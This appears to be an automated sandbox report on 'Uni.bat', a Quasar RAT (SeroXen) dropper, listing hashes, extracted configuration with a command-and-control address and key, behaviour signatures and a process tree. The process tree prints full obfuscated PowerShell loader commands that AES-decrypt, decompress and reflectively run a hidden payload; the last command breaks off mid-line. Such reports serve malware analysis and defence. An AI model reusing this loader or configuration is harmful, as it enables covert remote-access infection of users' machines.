Overview

overview

10

Static

static

1

Uni.bat

windows10-2004-x64

10

Uni.bat

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    102s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 17:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Uni.bat

  • Size

    10.4MB

  • MD5

    2c35e3c096365f1e1ad3bcc4de8574f7

  • SHA1

    5e96223c4626c43a1c3306dbb76d94881ba6abbd

  • SHA256

    91c8ec0b835f0470ee1a8b3c0c18b412c2883e3621e684cf273f3120252a8146

  • SHA512

    ccccc2f5a9d80a8fc1c8431dda01973f8b81832e1e77a1e42579beb3521febbd51d9d11f58782ee68d381235f902853a1f6597de2e6ca4b15cda2a66896f4f7c

  • SSDEEP

    49152:PqzgPmL6ky1xm3CCeGx8pb8y2qsqnnjh3WhZKEP7ciaTCfuoeKPtyT5YAv6cKoTW:a

Score
10/10
quasarv15.4.5 | seroxendefense_evasiondiscoverypersistencespywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

v15.4.5 | SeroXen

C2

147.185.221.23:58175

Mutex

a00acb06-91e4-48b0-99a0-b2768c5ea752

Attributes
  • encryption_key

    E9B24DC5A9D33874B0626389429DD789286126DC

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    230

  • startup_key

    $sxr-seroxen

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
  • Detected Nirsoft tools 1 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 4 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 12 IoCs
  • Enumerates connected drives 3 TTPs 29 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Hide Artifacts: Hidden Window 1 TTPs 11 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

    defense_evasion
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 54 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{99bbe788-bb7a-4490-8c4a-33cdd7f8bf69}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3188
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{bd0810d3-5dce-4c81-a9b6-f985cef81541}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:956
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{58313342-9ca5-4d7d-baa7-bbe367c42256}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3300
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{cf2b84d3-16fb-456d-816f-5136f5509291}
          2⤵
            PID:6028
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{98bfacd3-2d12-4ac1-b093-a69c3eb9f1a2}
            2⤵
              PID:3588
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{97f46a6c-2757-4244-aac5-f05407d19d8b}
              2⤵
                PID:5780
              • C:\Windows\System32\dllhost.exe
                C:\Windows\System32\dllhost.exe /Processid:{19551404-6814-4308-abf6-bbc32e30a1e9}
                2⤵
                  PID:4012
                • C:\Windows\explorer.exe
                  explorer.exe
                  2⤵
                  • Boot or Logon Autostart Execution: Active Setup
                  • Enumerates connected drives
                  • Checks SCSI registry key(s)
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:5116
                • C:\Windows\explorer.exe
                  explorer.exe
                  2⤵
                  • Boot or Logon Autostart Execution: Active Setup
                  • Enumerates connected drives
                  • Checks SCSI registry key(s)
                  • Modifies registry class
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:4712
                • C:\Windows\explorer.exe
                  explorer.exe
                  2⤵
                  • Boot or Logon Autostart Execution: Active Setup
                  PID:3448
                • C:\Windows\explorer.exe
                  explorer.exe
                  2⤵
                    PID:3828
                  • C:\Windows\explorer.exe
                    explorer.exe
                    2⤵
                      PID:436
                    • C:\Windows\explorer.exe
                      explorer.exe
                      2⤵
                        PID:3708
                      • C:\Windows\explorer.exe
                        explorer.exe
                        2⤵
                          PID:2564
                        • C:\Windows\explorer.exe
                          explorer.exe
                          2⤵
                            PID:1164
                          • C:\Windows\explorer.exe
                            explorer.exe
                            2⤵
                              PID:3116
                            • C:\Windows\explorer.exe
                              explorer.exe
                              2⤵
                                PID:1400
                              • C:\Windows\explorer.exe
                                explorer.exe
                                2⤵
                                  PID:6068
                                • C:\Windows\explorer.exe
                                  explorer.exe
                                  2⤵
                                    PID:228
                                • C:\Windows\system32\lsass.exe
                                  C:\Windows\system32\lsass.exe
                                  1⤵
                                    PID:660
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                    1⤵
                                      PID:948
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                      1⤵
                                        PID:60
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                        1⤵
                                          PID:1028
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                          1⤵
                                            PID:1052
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                            1⤵
                                              PID:1092
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                              1⤵
                                                PID:1212
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                1⤵
                                                • Drops file in System32 directory
                                                PID:1252
                                                • C:\Windows\system32\taskhostw.exe
                                                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                                  2⤵
                                                    PID:2744
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                  1⤵
                                                    PID:1292
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                    1⤵
                                                      PID:1300
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                      1⤵
                                                        PID:1316
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                        1⤵
                                                          PID:1444
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                          1⤵
                                                            PID:1452
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                            1⤵
                                                              PID:1480
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                              1⤵
                                                                PID:1520
                                                                • C:\Windows\system32\sihost.exe
                                                                  sihost.exe
                                                                  2⤵
                                                                    PID:2648
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                  1⤵
                                                                    PID:1636
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                    1⤵
                                                                      PID:1696
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                      1⤵
                                                                        PID:1748
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                        1⤵
                                                                          PID:1776
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                          1⤵
                                                                            PID:1864
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                            1⤵
                                                                              PID:1992
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                              1⤵
                                                                                PID:2024
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                1⤵
                                                                                  PID:2040
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                  1⤵
                                                                                    PID:1720
                                                                                  • C:\Windows\System32\spoolsv.exe
                                                                                    C:\Windows\System32\spoolsv.exe
                                                                                    1⤵
                                                                                      PID:2108
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2120
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                      1⤵
                                                                                        PID:2232
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                        1⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2240
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                        1⤵
                                                                                          PID:2448
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                          1⤵
                                                                                            PID:2456
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                            1⤵
                                                                                              PID:2672
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                              1⤵
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:2720
                                                                                            • C:\Windows\sysmon.exe
                                                                                              C:\Windows\sysmon.exe
                                                                                              1⤵
                                                                                                PID:2804
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                1⤵
                                                                                                  PID:2856
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                  1⤵
                                                                                                    PID:2864
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                    1⤵
                                                                                                    • Enumerates connected drives
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2880
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                    1⤵
                                                                                                      PID:3048
                                                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:3136
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                        1⤵
                                                                                                          PID:3392
                                                                                                        • C:\Windows\Explorer.EXE
                                                                                                          C:\Windows\Explorer.EXE
                                                                                                          1⤵
                                                                                                            PID:3508
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                                                                              2⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:2136
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                3⤵
                                                                                                                  PID:1744
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
                                                                                                                  "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $WOPSU = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($hZSOM in $WOPSU) { if ($hZSOM.StartsWith(':: ')) { $WUBQW = $hZSOM.Substring(3); break; }; };$TltnC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($WUBQW);$hiWzu = New-Object System.Security.Cryptography.AesManaged;$hiWzu.Mode = [System.Security.Cryptography.CipherMode]::CBC;$hiWzu.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$hiWzu.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R+7km1Kng+Tk/g22yIYfJi3KNN0y7ahu3CCAqlAFHj4=');$hiWzu.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W5Ypky4J6VtH280ftgrmGw==');$UBSjF = $hiWzu.CreateDecryptor();$TltnC = $UBSjF.TransformFinalBlock($TltnC, 0, $TltnC.Length);$UBSjF.Dispose();$hiWzu.Dispose();$qWlQq = New-Object System.IO.MemoryStream(, $TltnC);$wGZkP = New-Object System.IO.MemoryStream;$nddmN = New-Object System.IO.Compression.GZipStream($qWlQq, [IO.Compression.CompressionMode]::Decompress);$nddmN.CopyTo($wGZkP);$nddmN.Dispose();$qWlQq.Dispose();$wGZkP.Dispose();$TltnC = $wGZkP.ToArray();$zfuyh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($TltnC);$qykKF = $zfuyh.EntryPoint;$qykKF.Invoke($null, (, [string[]] ('')))
                                                                                                                  3⤵
                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                  • Checks computer location settings
                                                                                                                  • Deletes itself
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1896
                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    4⤵
                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:3896
                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3896).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join 